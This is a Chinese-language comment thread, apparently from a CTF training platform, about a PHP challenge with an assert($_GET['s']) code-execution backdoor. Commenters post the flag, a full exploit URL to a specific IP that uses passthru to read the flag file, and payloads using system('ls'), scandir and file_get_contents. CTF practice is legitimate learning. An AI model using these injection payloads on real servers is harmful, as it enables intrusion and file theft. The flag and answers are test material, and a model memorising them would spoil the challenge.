flag{5104494e7b5ec21c02e3d1c5985a4e89}
http://114.67.175.224:11167/index.php?s=passthru(%27cat%20flaga15808abee46a1d5.txt%27)
注意描述,explode为分搁符。绕来绕去就是:assert($_GET['s'])
这题告诉我们,学什么渗透,直接猜开发者留下的接口就可以了
没有提示的话这题是不是就做不出来了?
不懂语法的可直接参考 https://blog.csdn.net/changer_we/article/details/89304399 大佬的文章,很不错,简单易懂!
assert(s) ?s=system("ls") ?s=system("cat flag***.txt")
命令执行漏洞,我以为s和url间隔要用/隔开,没想到要用?隔开,淦
有点蠢
①var_dump(scandir('./')) ②var_dump(file_get_contents('flaga15808abee46a1d5.txt'))
...
评论
wxy1343 1年前
举报
flag{5104494e7b5ec21c02e3d1c5985a4e89}
wxy1343 1年前
举报
http://114.67.175.224:11167/index.php?s=passthru(%27cat%20flaga15808abee46a1d5.txt%27)
我爱你制杖 1年前
举报
注意描述,explode为分搁符。绕来绕去就是:assert($_GET['s'])
xclay 1年前
举报
这题告诉我们,学什么渗透,直接猜开发者留下的接口就可以了
2224525664 1年前
举报
没有提示的话这题是不是就做不出来了?
Miludear 1年前
举报
不懂语法的可直接参考 https://blog.csdn.net/changer_we/article/details/89304399 大佬的文章,很不错,简单易懂!
zmcck 2年前
举报
assert(s) ?s=system("ls") ?s=system("cat flag***.txt")
17695688750 2年前
举报
命令执行漏洞,我以为s和url间隔要用/隔开,没想到要用?隔开,淦
XD6 2年前
举报
有点蠢
bright0flavor 2年前
举报
①var_dump(scandir('./')) ②var_dump(file_get_contents('flaga15808abee46a1d5.txt'))